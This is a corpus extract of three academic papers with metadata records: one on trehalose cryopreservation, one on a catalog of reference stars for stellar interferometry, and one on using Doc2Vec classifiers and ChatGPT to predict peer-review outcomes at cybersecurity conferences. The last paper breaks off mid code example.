It has been hypothesized that trehalose provides protection during electropermeabilization in a manner similar to chelating agents such as EDTA or lipids like cholesterol (Katkov, 2002; Mussauer et al., 2001). Effective electroporation protocols are a balance between how much material can be loaded into the cells and cell survival after membrane permeabilization. So, while it cannot be predicted how well certain cell types will respond to electroporation, there is ample evidence that electroporation can be used with reasonable certainty of success. A short culture period may be all that is required to permit restabilization of membranes post-electroporation. Additionally, like trehalose, which interacts with membranes under stressful conditions such as drying, other compounds, such as cholesterol and unsaturated fatty acids, can also interact with membranes and may facilitate membrane resealing, increasing overall cell survival (Katkov, 2002). Efficient resealing of cell membranes after permeabilization is thought to be essential for promoting cell recovery (Gehl et al., 1999), and compounds such as Poloxamer 188 facilitate membrane resealing (Lee et al., 1992).
Conclusion
In conclusion, there are multiple potential ways to introduce trehalose into mammalian cells, and in some cases excellent cell preservation can be achieved. However, it is clear that methods for each cell type will need to be diligently developed, and many years of work remain before we can replace DMSO as the lead cryoprotectant. In the meantime, we must not forget that there are other relatively low-molecular-weight sugars available. Preliminary evidence suggests that, with further work, sucrose and stachyose may in some cases be equally effective for cell preservation.
Acknowledgements
We would like to thank Elizabeth Greene for her assistance in the preparation of this manuscript. This work was supported by a cooperative agreement (No. 70NANB1H3008) between the U.S. Department of Commerce, National Institute of Standards and Technology-Advanced Technology Program, and Organ Recovery Systems, Inc. | 2017-09-08T10:03:00.274Z | 2012-03-14T00:00:00.000 | {
"year": 2012,
"sha1": "2fc7338d09dadf49478391e6afa833526e935b51",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.5772/32979",
"oa_status": "HYBRID",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "b32c339ffdf0b5bad233c16d8803de8ecfa93d11",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Chemistry"
]
} |
14348182 | pes2o/s2orc | v3-fos-license | A catalog of reference stars for long baseline stellar interferometry
The calibration process of long baseline stellar interferometers requires the use of reference stars with accurately determined angular diameters. We present a catalog of 374 carefully chosen stars among the all-sky network of infrared sources provided by Cohen et al. 1999. The catalog benefits from a very good sky coverage and a median formal error on the angular diameters of only 1.2%. Besides, it groups together in a homogeneous, handy set stellar coordinates, uniform-disk and limb-darkened angular diameters, photometric measurements, and other parameters relevant to optical interferometry. In this paper, we describe the selection criteria applied to qualify stars as reference sources. Then, we discuss the catalog's statistical properties such as the sky coverage or the distributions of magnitudes and angular diameters. We study the number of available reference stars as a function of the baseline and the precision needed on the visibility measurements. Finally, we compare the angular diameters predicted in Cohen et al. 1999 with existing determinations in the literature, and find a very good agreement.
INTRODUCTION
Astronomical optical interferometers need to be calibrated not only against long-term drifts but also against short-term effects due to atmospheric turbulence. The usually adopted solution consists in interleaving observations of scientific targets and reference sources. A reference source is an astronomical source for which the theoretical fringe contrast, or visibility, can be predicted with a high accuracy. The visibility of the scientific target can then be deduced from the equation
$V_{\rm target} = \frac{\mu_{\rm target}}{\mu_{\rm ref}}\, V_{\rm ref}, \quad (1)$
where µ denotes a measured fringe contrast and V a visibility. The reference sources that have the simplest model are non-resolved or almost non-resolved single stars with compact atmospheres, and will be called reference stars or calibrators in the following. They can be correctly described by a uniform disk (UD) model whose visibility is
$V_{\rm UD} = \left| \frac{2\,J_1(\pi\,\theta_{\rm UD}\,B\,\sigma_{\rm eff})}{\pi\,\theta_{\rm UD}\,B\,\sigma_{\rm eff}} \right|, \quad (2)$
where σ_eff is the effective wavenumber (see Sect. 3.4), B the interferometric baseline projected on the sky, and θ_UD the stellar angular diameter. As many instrumental effects depend on the direction aimed at the sky, it is preferable that the reference star be close to the target. Hence arises the need for a grid of such stars with a good sky coverage. In this paper, we describe the catalog of reference stars that was made up for that purpose by the FLUOR 2 team (more details will be available in a forthcoming paper 3).
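To make Eq. (2) concrete, here is a minimal numeric sketch in Python; the diameter, baseline, and wavenumber values are illustrative, not taken from the catalog.

```python
import numpy as np
from scipy.special import j1

MAS_TO_RAD = np.pi / (180 * 3600 * 1000)  # milliarcseconds to radians

def v_ud(theta_mas, baseline_m, sigma_eff_cm):
    """Uniform-disk visibility of Eq. (2)."""
    x = np.pi * theta_mas * MAS_TO_RAD * baseline_m * sigma_eff_cm * 100.0
    return np.abs(2 * j1(x) / x)

# Illustrative: a 2.3 mas calibrator on a 100 m baseline in the K band
print(v_ud(2.3, 100.0, 4685.0))  # ~0.70
```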
In Sect. 2, we explain the selection process of our reference stars. Section 3 describes the catalog's content and Sect. 4 its statistical properties. Finally, we compare the angular diameters of our reference stars to other existing determinations in Sect. 5.
SELECTION OF REFERENCE STARS
As explained in the introduction, reference stars have to be non-variable single stars with compact atmospheres and accurately known angular diameters. In order to build their all-sky network of absolutely calibrated stellar spectra, Martin Cohen and collaborators 1 used criteria that match our requirements quite well. Moreover, they derived angular diameters with formal errors by fitting Kurucz's atmosphere models to the stellar spectra of some prototype stars. By making the fundamental assumption that every K0-M0 giant has a spectrum identical to that of its prototype, they extended their collection of spectra to 422 well-chosen stars by rescaling the spectra in flux thanks to photometric measurements. Angular diameters are then derived using the scaling factor. In the following, this method will be referred to as the spectro-photometric method (SPM).
We have taken advantage of this existing network by extracting a subset of reference stars suitable for the calibration of stellar interferometers. Our extra requirements are essentially the absence of significant variability (> 0.01 mag) and of close binary companions, both of which would necessitate a model more elaborate than Eq. (2). The initial network is then cross-checked with the Simbad database († http://simbad.u-strasbg.fr/Simbad), the Batten catalog of spectroscopic binaries, 4 and the catalog of visual double stars observed by Hipparcos. 5 We choose to discard all double stars with separations less than 4″, and to avoid pointing confusion, we keep double stars with separations between 4″ and 30″ only when the companion is five magnitudes fainter than the primary. Companions' magnitudes and separations are noted in the comments. As a result of this more stringent selection, our catalog is left with 374 entries.
Star identification
The catalog is meant to group together all useful information in the context of long baseline stellar interferometry (LBSI). The Henry Draper (HD) number has been chosen as the main identifier in the catalog (the Bright Star Catalog number, denoted HR, is also provided for convenience). As the knowledge of these stars is likely to improve in the future, it is very important to keep track of the calibrator(s) used for a given scientific observation, so that any data could be reduced again if necessary. Additionally, it makes it easier to search for observations that used the same calibrator(s) and that are thus correlated. 6 Identifiers (HD, HR, and Bayer or Flamsteed name) are followed by the stellar coordinates, some physical properties, angular diameters in different bands, some cross-properties of the star and FLUOR, the photometry, and some comments (Table 1).
Angular diameters
Limb-darkened angular diameters have been computed in Ref. 1 for every star. This diameter corresponds to the physical diameter of the star, i.e. the one that appears in the Stefan-Boltzmann law
$F_{\rm bol} = \left(\frac{\theta_{\rm LD}}{2}\right)^{2} \sigma_S\, T_{\rm eff}^{4}, \quad (3)$
where F_bol is the bolometric flux (W/m²) emitted by the star and σ_S denotes the Stefan-Boltzmann constant. As such, θ_LD is independent of the observational wavelength. This diameter can be converted into the UD angular diameter of Eq. (2), usually used by interferometrists. However, the latter depends on the wavelength, so a spectral band has to be specified. The following formula 7 provides an efficient way to perform the conversion using linear limb-darkening coefficients u_λ:
$\frac{\theta_{\rm LD}}{\theta_{\rm UD}} = \left(\frac{1 - u_\lambda/3}{1 - 7u_\lambda/15}\right)^{1/2}. \quad (4)$
For every star, we interpolate u_λ in the tables computed in Ref. 8 using the effective temperature T_eff and the surface gravity log(g) derived from the spectral type. 9, 10 Then, Eq. (4) yields UD angular diameters in the J, H, and K bands. As the conversion process introduces an additional, although very small, error, the catalog states the new uncertainty for every UD diameter.
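The conversion of Eq. (4) is straightforward to script; the sketch below assumes an illustrative limb-darkening coefficient rather than a value interpolated from the tables of Ref. 8.

```python
import math

def ud_from_ld(theta_ld, u_lambda):
    """Convert a limb-darkened diameter into a uniform-disk diameter (Eq. 4)."""
    ratio = math.sqrt((1 - u_lambda / 3) / (1 - 7 * u_lambda / 15))  # theta_LD / theta_UD
    return theta_ld / ratio

# Illustrative: theta_LD = 2.3 mas with a K-band coefficient u ~ 0.3
print(ud_from_ld(2.3, 0.3))  # ~2.25 mas
```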
Photometry
For every star, the catalog features the B and V magnitudes drawn from the Simbad database, and the J to N infrared magnitudes taken from Ref. 1, or estimated from the spectral type using the tables in Refs. 11 and 12. A boolean flag indicates whether the quoted value is a measurement or not.
Effective wavenumber and shape factor
The effective wavenumber and the shape factor are cross-properties of the star's spectrum and of the instrument.
In the case of FLUOR, observations are carried out in the K' band (2.0-2.3 µm) and these quantities have been computed in this band only. The effective wavenumber is the wavenumber at which the monochromatic visibility defined by Eq. (2) is equal to the measured wide-band visibility. If S denotes the star's spectrum multiplied by the filter's transmission profile, the effective wavenumber is
$\sigma_{\rm eff} = \frac{\int \sigma\, S^2(\sigma)\, {\rm d}\sigma}{\int S^2(\sigma)\, {\rm d}\sigma}. \quad (5)$
As explained in Ref. 13, the wide-band fringe contrast measured by FLUOR is weighted by the squared stellar spectrum:
$\mu = \frac{\int S^2(\sigma)\, V(\sigma)\, {\rm d}\sigma}{\int S^2(\sigma)\, {\rm d}\sigma}. \quad (6)$
The shape factor SF allows for a correct calibration when the spectral types of the target and its reference stars are different. Effective wavenumbers and shape factors should mostly be considered as relative information between stars of different spectral types. Their typical values are respectively 4685 cm⁻¹ and 13.19 µm, and they vary very little from one spectral type to another.
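Assuming the reconstructed form of Eq. (5), the effective wavenumber can be computed numerically from a sampled spectrum; the flat K'-band spectrum below is only a placeholder for a real stellar spectrum times filter profile.

```python
import numpy as np

def effective_wavenumber(sigma, s):
    """S^2-weighted mean wavenumber (Eq. 5); sigma in cm^-1."""
    w = s ** 2
    return np.trapz(sigma * w, sigma) / np.trapz(w, sigma)

# Placeholder: flat spectrum over the K' band (2.0-2.3 um ~ 4348-5000 cm^-1)
sigma = np.linspace(1e4 / 2.3, 1e4 / 2.0, 500)
print(effective_wavenumber(sigma, np.ones_like(sigma)))  # ~4674 cm^-1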
Comments
This field is used to provide additional information about the source: the object type 14 as given by Simbad, and the separations and magnitudes of the companions when the source is a double or multiple star.
CATALOG'S STATISTICAL PROPERTIES
Global statistics
A major feature of our catalog is its excellent sky coverage (Fig. 1): whatever the point on the sky, its distance to the closest reference star is less than 16.4°, and the median distance is 5.2°. Most stars (91%) are class III giants with a spectral type K (82%) or M0 (18%). Most stars (72%) also have a visual magnitude between 4 and 6, and almost all of them (95%) between 3 and 7, with a median value of 5.0. As for the K magnitude, most stars (95%) lie in the interval K = 0-3 with a median value of 1.8. Limb-darkened angular diameters range from 1 to 10 mas (Fig. 2a) with a median value of 2.3 mas. The median error on the diameter is only 1.2% (Fig. 2b), which brings a significant gain in the achievable visibility accuracy (Fig. 2c).
Catalog's effective size
In the framework of a UD model, the relative error on the visibility reads
$\frac{\Delta V}{V} = \left|\frac{x\,J_2(x)}{J_1(x)}\right| \frac{\Delta\theta_{\rm UD}}{\theta_{\rm UD}}, \quad x = \pi\,\theta_{\rm UD}\,B\,\sigma_{\rm eff}, \quad (7)$
assuming negligible errors on the effective wavenumber and on the interferometric baseline. Figure 2c represents the visibility and the error on the visibility as a function of the reduced variable x. Equation (7) implies that not all of the catalog's reference stars have diameter estimates accurate enough to allow a given precision on the visibility, whatever the wavenumber and the baseline. For example, the number of stars whose error on the angular diameter is small enough to be used for a given accuracy on the visibility in the K band and at a given baseline is given in Table 2 and displayed in Fig. 2d.
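A short sketch of Eq. (7), useful for checking whether a given calibrator supports a target visibility accuracy; the calibrator parameters are illustrative.

```python
import numpy as np
from scipy.special import j1, jv

MAS_TO_RAD = np.pi / (180 * 3600 * 1000)

def rel_vis_error(theta_mas, rel_diam_error, baseline_m, sigma_eff_cm=4685.0):
    """Relative visibility error of Eq. (7) for a UD calibrator."""
    x = np.pi * theta_mas * MAS_TO_RAD * baseline_m * sigma_eff_cm * 100.0
    return abs(x * jv(2, x) / j1(x)) * rel_diam_error

# A 2.3 mas calibrator with a 1.2% diameter error on two baselines
for b in (100.0, 200.0):
    print(b, rel_vis_error(2.3, 0.012, b))
```

Note how the error grows rapidly as x approaches the first null of J_1, which is why longer baselines demand calibrators with smaller or better-constrained diameters.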
COMPARISON WITH OTHER DIAMETER DETERMINATIONS
We have searched the literature by way of the CHARM catalog 16 (Catalog of High Angular Resolution Measurements) for other angular diameter determinations of the stars in our catalog. Angular diameters can either be estimated by photometric means or directly measured by LBSI or during a lunar occultation. In the following sections, we examine two photometric methods and direct measurements performed by two interferometers.
Table 2. Catalog's effective size in the K band: number of stars whose error on the angular diameter is small enough to be used for a given accuracy on the visibility.
The surface-brightness method 19 (SBM) provides another way to derive the angular diameter:
$S_V = V + 5 \log \theta_{\rm LD}, \quad (8)$
where S_V is the surface brightness in the V band. We have plotted in Fig. 3b the right-hand side of Eq. (8) vs. V−K. The superimposed values for our reference stars (crosses) match the curve nicely.
These two results demonstrate that the spectro-photometric method is completely consistent with other indirect methods.
Interferometric measurements
The NPOI and Mark III interferometers have measured the angular diameters of 21 stars belonging to our catalog. 20 We compare here the LD diameters deduced from the UD diameters measured in the visible, using a procedure very similar to the conversion process described in Sect. 3.2. Again, the agreement is very good (Fig. 3a): a linear least-squares fit to the data yields θ_LBSI = (1.03 ± 0.01) × θ_SPM + (−0.15 ± 0.03). The average precisions of the NPOI and Mark III data are respectively 1.9% and 1.6%. A chi-square analysis of the difference θ_SPM − θ_LBSI shows a good compatibility of the error bars, since χ² equals 3.0 and 2.4, respectively.
CONCLUSION
We have presented a catalog of 374 carefully chosen reference stars for optical interferometry. Depending on the precision needed on the visibility, it is well suited for interferometers with baselines up to 200 m. Although this catalog has proven fully satisfactory since its first use by the FLUOR team in October 1999, most stars have not yet been observed by any interferometer and still need to be checked. More work lies ahead to extend this catalog to reference stars suitable for longer baselines, such as those of CHARA 21 (330 m) and 'OHANA 22 (800 m), or to instruments with very high accuracies like AMBER. 23 | 2014-10-01T00:00:00.000Z | 2003-01-22T00:00:00.000 | {
"year": 2003,
"sha1": "d8902f95f9e337e68bba3a2c628d4e76fe960541",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/astro-ph/0301434",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "932366c9d508640f8f649cf352f23dc778234194",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Engineering",
"Physics"
]
} |
261696572 | pes2o/s2orc | v3-fos-license | Unveiling the Sentinels: Assessing AI Performance in Cybersecurity Peer Review
Peer review is the method employed by the scientific community for evaluating research advancements. In the field of cybersecurity, the practice of double-blind peer review is the de facto standard. This paper touches on the holy grail of peer reviewing and aims to shed light on the performance of AI in reviewing for academic security conferences. Specifically, we investigate the predictability of reviewing outcomes by comparing the results obtained from human reviewers and machine-learning models. To facilitate our study, we construct a comprehensive dataset by collecting thousands of papers from renowned computer science conferences and the arXiv preprint website. Based on the collected data, we evaluate the prediction capabilities of ChatGPT and a two-stage classification approach based on the Doc2Vec model with various classifiers. In our experimental evaluation of review outcome prediction, the Doc2Vec-based approach performs significantly better than ChatGPT, achieving an accuracy of over 90%. While analyzing the experimental results, we identify the potential advantages and limitations of the tested ML models. We explore areas within the paper-reviewing process that can benefit from automated support approaches, while also recognizing the irreplaceable role of human intellect in certain aspects that cannot be matched by state-of-the-art AI techniques.
Introduction
The scientific review and decision-finding process relies heavily on peer reviewers' judgment and agreement. Decisions ultimately rest on the reviewers' judgment and discussion of aspects like technical correctness, novelty, and coverage of experimental results [31], but also of more subjective aspects like creativity, applicability, and scientific contribution. Even though biased, no better approach than human inspection is known for judging scientific progress. At the same time, advances in Artificial Intelligence (AI) and machine learning (ML) raise the question to which level AI models could act as a reviewer in the scientific review process [32]. Analyzing the difference between human review results and ML predictions can provide a way to uncover hidden aspects of the decision-making process. The application of ML for the prediction of reviewing outcomes is interesting as it challenges both the limits of AI and the logic of scientific publication in the first place. We expect that ML-based techniques can be used to predict a certain part of the review decision process, but not all of it.
We have set out to investigate this question for computer security and privacy, since this research area has seen a tremendous increase in paper submissions in recent years, which has challenged the peer-reviewing process at first-tier security conferences 3 and the reviewers' ability to provide timely and comprehensive reviews. Organizers of those conferences have expanded the pools of reviewers, introduced journal-like paper-revision opportunities and the submission of commented prior reviews, but the wealth of submissions remains challenging to handle. We direct readers to Appendix A for a detailed introduction to the peer-review process at the "Big-4". Recently, Soneji et al. [31] investigated the peer-review process in the computer security field using qualitative research methods (interviews). Our work is complementary, as we conduct a quantitative investigation.
Related endeavors were pursued in other research areas of computer science. The computer vision community presented methods for automatically deriving a measure of paper quality based on basic visual features of papers [38,15]. However, this line of research is solely based on the visual appearance of papers, ignoring the textual contents. In Natural Language Processing (NLP), researchers proposed text-based methods to grade essays [18], answer mathematical questions [17], assess handwritten work [29], and evaluate papers [41] (achieving an accuracy of below 68%). Due to the recent emergence of ChatGPT [23], there has been a surge in efforts to explore its application as an auxiliary academic reviewer or as a tool for assisting in paper reviewing [22,13,32].
In this paper, we investigate the performance of AI in the domain of cybersecurity academic paper reviewing. Specifically, we develop a pipeline consisting of a Doc2Vec [20] model for document embedding and ML classification models trained to predict acceptance or rejection based on these vector representations. We compare our proposed pipeline with ChatGPT. To construct a comprehensive dataset for training and testing, we gather a substantial collection of publicly accessible papers from leading computer science conferences, amounting to over 10,000 papers. One significant challenge we face is obtaining a negative sample set for ML training. Since submitted papers are not publicly available until proceedings are published, we employ alternative approaches. We approximate a negative sample set by utilizing public archival versions of papers provided by authors and employ several heuristics in the selection process.
In short, the major contributions of this paper are:
1. We build a large dataset with over 14,000 papers. It consists of over 10,000 accepted conference papers and over 4,000 preprint papers collected from the arXiv preprint website.
2. We train ML models to predict whether a paper is to be accepted by top-tier conferences in computer security and privacy and show their quantitative predictive results. Our experiments show that our best models can achieve approx. 91% accuracy in predicting the reviewing decisions for security papers, significantly outperforming ChatGPT.
3. We conduct further experiments to explore the capability of our method in dealing with abstracts and novel papers. Subsequently, we analyze the experimental results, present the insights gained, and discuss the implications of both ChatGPT and the proposed pipeline in relation to the current peer-review system.
Related Work
Several approaches have been proposed for similar tasks [21], broadly classified into two categories: vision-based and text-based approaches.
Vision-based Approaches. Von Bearnensquash [38] proposed a method based on AdaBoost to classify an academic paper using the paper's appearance (i. e., paper gestalt). The author first turned papers into pictures using PDF-to-image conversion tools and then trained a classifier using the image features extracted from these pictures. Later on, Huang [15] extended this idea by leveraging deep-learning models. The author also built a generative model that could generate paper gestalts that would be accepted by the classifier. The author concludes that figures and tables are crucial factors for predicting the decision. However, these trained models are not suitable for predicting the reviewing results of security papers, since security papers differ from computer-vision papers in general. Essentially, vision-based methods only consider paper layout and neglect paper contents. When papers are being reviewed, the criteria are focused on the contents (e. g., writing quality, novelty, contribution, etc.). That is why our method considers text content rather than paper layout as a feature.
Text-based Approaches. Taghipour et al. [35] proposed neural-network models, including CNN and LSTM [14], for the task of automated essay scoring. The authors compared neural networks with different settings in their experiments. Alikaniotis et al. [1] also leveraged neural networks in their paper. The authors proposed an augmented C&W model [10] with LSTM to score essays on a Kaggle dataset. Even though their methods are relevant to ours, their aim is scoring educational essays rather than scientific papers, which fundamentally differs from our goal. We consider a 2018 paper from Yang et al.
[41] to be the most relevant research to our goal. They first proposed a new task called automatic academic paper rating. The authors built a new dataset using papers collected from arXiv and proposed a modularized hierarchical CNN as a classifier. The authors claim their method to be the state of the art for rating academic papers. However, they focus neither on computer security papers nor on insights into the peer-review paradigm. Another interesting study was conducted by Bartoli et al. [3], who proposed a model for the automatic generation of scientific paper review comments. Their goal is to generate reviews for scientific papers that could deceive people. They use traditional methods rather than neural networks to avoid the requirement of a large amount of training data.
Our work differs from these related works as follows: (1) Our model is a classification model which predicts the decision of an academic paper. (2) We focus on computer security conference papers. (3) Our discussion is focused on the peer-review process. (4) We provide comparison with ChatGPT.
Besides the aforementioned technical works, a recent IEEE S&P paper by Soneji et al. [31] is a great inspiration. They conducted a qualitative study of 21 reviewers and chairs to understand the peer-review process in computer security. Over half of the participants shared negative sentiments toward the current review system. Their findings motivate us to explore the predictability of peer-review outcomes for security papers.
Background
Doc2Vec. Doc2Vec [20], as its name suggests, is a method to represent a document by a vector. It was developed on the basis of Word2Vec, is likewise an unsupervised learning method, and benefits from large datasets. We leveraged this property of Doc2Vec and trained our model on a large set of academic papers to enable Doc2Vec to generate high-quality document embeddings for the ML-based reviewing process.
ChatGPT. ChatGPT [23], developed by OpenAI, is an advanced chatbot that utilizes a large language model (LLM) and state-of-the-art language-modeling techniques to generate responses that closely resemble human-like conversations. Through extensive training on diverse textual data, ChatGPT demonstrates an impressive ability to comprehend and produce coherent and contextually appropriate replies. Notably, recent research suggests that the GPT model represents an early version of an artificial general intelligence (AGI) system, although it remains incomplete [8]. The integration and utilization of ChatGPT in academic settings have sparked discussions [16,33].
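As a rough illustration of how such document vectors are obtained in practice, the following sketch uses the gensim implementation of Doc2Vec; the toy corpus and hyperparameters are ours, not the exact setup used in our experiments (see Sect. 4).

```python
from gensim.models.doc2vec import Doc2Vec, TaggedDocument

papers = [("paper_0", "we present a novel intrusion detection system ..."),
          ("paper_1", "this work analyzes side channel leakage ...")]
corpus = [TaggedDocument(words=text.split(), tags=[pid]) for pid, text in papers]

model = Doc2Vec(vector_size=300, window=5, min_count=1, epochs=20, workers=4)
model.build_vocab(corpus)
model.train(corpus, total_examples=model.corpus_count, epochs=model.epochs)

# Infer an embedding for an unseen document
vec = model.infer_vector("a new fuzzing technique for kernel drivers".split())
print(vec.shape)  # (300,)
```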
Data Collection
To train and test the paper classification models, a dataset with a large number of scientific papers is needed. Since no existing dataset can be utilized directly, we first need to create one.
Given the unsupervised nature of Doc2Vec's learning approach (see Section 4.2), its performance improves with larger training data. However, the limited number of security conference papers impedes the training of Doc2Vec. To overcome this limitation, we gather accepted papers from prominent computer science conferences outside the realm of security. These conferences cover a wide range of topics and employ shared vocabularies, making them suitable for pre-training the Doc2Vec model. To generate high-quality embedding representations for security papers, we adopt a transfer-learning approach: our Doc2Vec model undergoes initial training on general computer science papers, followed by fine-tuning on computer security papers. To create the datasets, we collected published papers from first-tier computer science conferences encompassing domains such as computer vision, networking, and security, among others. We also incorporate papers sourced from the arXiv preprint website into our training data as negative (reject) samples; the details are explained in the following subsection.
Dataset Composition
Our dataset contains two subsets: Proceedings and Preprints. An overview of these two subsets is provided in Table 1.
The proceedings subset consists of over 10,000 published papers sourced from top computer conferences, encompassing both security-specific venues and broader computer science domains. Detailed statistical information regarding the conferences, their venues, and sample sizes can be found in Table 5 (Appendix).
The preprints subset comprises papers obtained from the arXiv preprint website. This subset plays a crucial role in the second stage of training, where our proposed models aim to determine the acceptance or rejection of papers by the "Big-4" conferences. We opted to utilize the arXiv dataset as negative (rejected) paper samples, employing well-defined selection rules (outlined below). This approach serves as an approximation of real review outcomes from actual security conferences, as acquiring such data directly presents both logistical and ethical challenges: first, access is difficult due to the closed and confidential nature of the review process; second, it would be inappropriate to collect papers and review outcomes without approval from the authors and reviewers at the time of submission.
Thus, we focus our attention on public sources of data, and after careful consideration, we have identified arXiv as a viable and rational choice. Widely embraced by the computer science community, arXiv offers a substantial volume of training samples. Furthermore, its research-friendly policy allows us to utilize the data without ethical concerns. We acknowledge that this approach is not without limitations: extracting papers from arXiv that are likely to have been submitted to and rejected by the "Big-4" conferences is subject to errors and serves only as an approximation of actual review outcomes. Nonetheless, we contend that our meticulous selection process, guided by heuristic rules, sufficiently reflects reality. In particular, we use published papers as positive samples, while negative samples are selected from the arXiv preprint papers based on specific criteria outlined below. The selection process for negative samples focuses on papers labeled with cs.CR on arXiv (indicating they belong to the security domain) and employs the three following heuristic rules (a condensed sketch follows the list):
- Rule 1: For arXiv preprint papers that ultimately appear in the "Big-4" conferences, if a paper has multiple versions on arXiv and its first version is at least one year older than its last version, then we consider the first version as a negative sample. This rule is based on the reasoning that, if a paper got accepted by the "Big-4" after evolving for at least a year before acceptance, then its first version was presumably already good, but not quite of the quality required to be accepted by the "Big-4", which makes it suitable as a negative sample. Since improving the content also takes time, we choose one year as a crude estimate of the heuristic threshold, based on our experience in refining papers.
- Rule 2: For arXiv preprint papers that have finally appeared at lower-ranked security conferences 4, we consider their first arXiv version as a negative sample. The reasoning here is that, if a paper got accepted at a lower-ranked security conference, it may well have been submitted to the "Big-4" first, been rejected, and then submitted elsewhere. Even if this is not the case, we believe these papers are of good quality, but not quite enough to be accepted at the top venues in the field.
- Rule 3: If an arXiv preprint paper does not get published at all and it was created prior to 2018, then we consider it a negative sample. This rule serves as a supplement to ensure a balanced training set when the first two rules do not yield a sufficient number of samples. The rationale behind this rule is that preprint-only security papers are likely submissions to the "Big-4" conferences or other reputable security conferences that did not receive acceptance. We limit the inclusion to preprint papers created before 2018, as more recent papers may still be undergoing the review process.
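The three rules can be condensed into a small filter, as sketched below. This is illustrative: the field names follow the Kaggle arXiv metadata snapshot ('versions' entries with 'created' timestamps), and the venue predicates stand in for the DBLP lookup described later.

```python
from datetime import datetime, timedelta

def select_negative(paper, is_big4, is_lower_ranked):
    """Return 'v1' if the paper's first arXiv version qualifies as a negative sample."""
    created = [datetime.strptime(v["created"], "%a, %d %b %Y %H:%M:%S %Z")
               for v in paper["versions"]]
    first, last = min(created), max(created)
    venue = paper.get("venue")  # resolved beforehand via a DBLP title search

    # Rule 1: accepted at the Big-4 after evolving on arXiv for >= 1 year
    if venue is not None and is_big4(venue) and last - first >= timedelta(days=365):
        return "v1"
    # Rule 2: finally published at a lower-ranked security venue
    if venue is not None and is_lower_ranked(venue):
        return "v1"
    # Rule 3: never published and created before 2018
    if venue is None and first.year < 2018:
        return "v1"
    return None
```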
We obtained a total of 43, 423, and 3,754 papers based on the three rules, respectively. It is worth noting that not all of these negative samples were utilized for training. With the proposed three rules, we identified more negative samples in the arXiv dataset than positive samples from the "Big-4" conferences. To balance the ratio of positive and negative samples, some papers selected by Rule 3 were randomly dropped. Since there are 3,984 positive samples, the number of negative samples was adjusted accordingly. The final numbers of negative samples used for training, based on the three rules, are 43, 423, and 3,518, respectively.
Data Acquisition
All papers in the proceedings subset we collected can be downloaded from public websites. We developed automated crawlers to retrieve a subset of accepted papers from various conference websites, supplemented by manual downloads for the remaining papers.
For the preprints subset, we first fetch the arXiv metadata from Kaggle 5 , and then use a crawler to download all the cs.CR papers from export.arxiv.org. We further use the DBLP 6 search function to check the venue information for all the downloaded papers so that we could select negative samples based on the heuristic rules. The DBLP team has a rigorous process of quality checking all new additions to the database [36]. The search function of DBLP is powered by CompleteSearch [5]. We conducted tests to assess the efficacy of the DBLP search function. The retrieval results were found to be accurate, even in cases where a few words were missing from the paper's title. It is important to note that significant changes in a paper's title may limit the effectiveness of the DBLP search function. However, we contend that the core keywords within the title generally remain consistent, reinforcing the reliability of the search function even in instances where the title undergoes substantial modifications.
Methodology
We first present our terminology (Sec. 4.1) before we elucidate the fundamental principles of vector embeddings as the basic problem definition (Sec. 4.2). We then delve into the intricacies of our paper classification process (Sec. 4.3, Figure 1), and outline our methodology for conducting the ChatGPT experiment (Sec. 4.4).
Terminology
The reviewing process can be viewed as a text classification problem, whose formal definition is given here. We gathered papers from top conferences and let them be a set D = {d_1, ..., d_N}, where N = |D| is the number of papers. Each paper is represented as a sequence of words
$d_i = (w_1, w_2, \ldots, w_M),$
where M is the number of words in the paper. The raw papers are then mapped to a high-dimensional vector space by the Doc2Vec model, after which each paper d_i is represented by a vector $\mathbf{d}_i$.
Definition. The binary classifier, denoted f(·), is the function defined by
$f(\mathbf{d}_i) = \begin{cases} 1, & \eta(\mathbf{d}_i) \ge 0.5 \\ 0, & \text{otherwise,} \end{cases}$
where η(·) is an ML classification algorithm giving a prediction probability score in [0, 1] based on the input vector. "1" means the classifier predicts the acceptance of the corresponding paper, while "0" indicates rejection.
Problem Definition: From Papers to Vector Embeddings
Here we briefly introduce how to use Doc2Vec to transform an original paper into a high-dimensional vector.
In the Doc2Vec framework, every raw paper is projected to a unique document vector [20], represented by a column in a matrix D, and every word in the paper is also mapped to a unique vector during training, represented by a column in a matrix W. Given a paper d_i and a sequence of words w_1, ..., w_M in the paper, the objective of the Doc2Vec model is to maximize the average log probability
$J(\theta) = \frac{1}{M} \sum_{t=k}^{M-k} \log p(w_t \mid w_{t-k}, \ldots, w_{t+k}, d_i),$
where k is the size of the training context and θ denotes the model parameters.
The document vector $\mathbf{d}_i$ here represents the missing information from the current context and can act as a memory of the topic of the document. Given the linear nature of the text, the contexts are fixed-length and sampled using a sliding window over consecutive words. For machine-learning problems, we generally minimize the value of a cost function, so a negative sign is added to the right side of J(θ) to turn it into a cost function J′(θ) for training. The context probability can be obtained by a multiclass classifier, e.g., the softmax function. Accordingly, we have
$p(w_t \mid w_{t-k}, \ldots, w_{t+k}, d_i) = \frac{e^{y_{w_t}}}{\sum_j e^{y_j}},$
in which the y_i are the logits output by the neural network used for training.
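For illustration, the softmax that produces this context probability can be written in a few lines of numpy; this is the standard numerically stable form, not code from the Doc2Vec implementation itself.

```python
import numpy as np

def softmax(y):
    """Numerically stable softmax over a vector of logits y."""
    z = y - np.max(y)  # shift for numerical stability
    e = np.exp(z)
    return e / e.sum()

p = softmax(np.array([2.0, 1.0, 0.1]))
print(p, p.sum())  # probabilities summing to 1
```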
Since the problem is to find the minimum of the cost function J′(θ), it is natural to use the gradient descent optimization algorithm. The gradient is obtained via backpropagation, and gradient descent is then used to train the document vectors and word vectors and to update the model parameters.
After the training stage, we employ the model in an inference stage to calculate the document vector of a new paper. The outcome is then fed directly into machine-learning classifiers, e.g., Naïve Bayes, Logistic Regression, support vector machines, or KNN, which predict whether the paper will be accepted or not.
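The final step can be illustrated as follows; the random vectors merely stand in for inferred Doc2Vec embeddings, and the linear SVM is one of the classifiers we test.

```python
import numpy as np
from sklearn.svm import SVC

rng = np.random.default_rng(0)
X_train = rng.normal(size=(200, 300))   # stand-ins for inferred Doc2Vec vectors
y_train = rng.integers(0, 2, size=200)  # 1 = accept, 0 = reject

clf = SVC(kernel="linear", probability=True)
clf.fit(X_train, y_train)

x_new = rng.normal(size=(1, 300))       # embedding of a new, unseen paper
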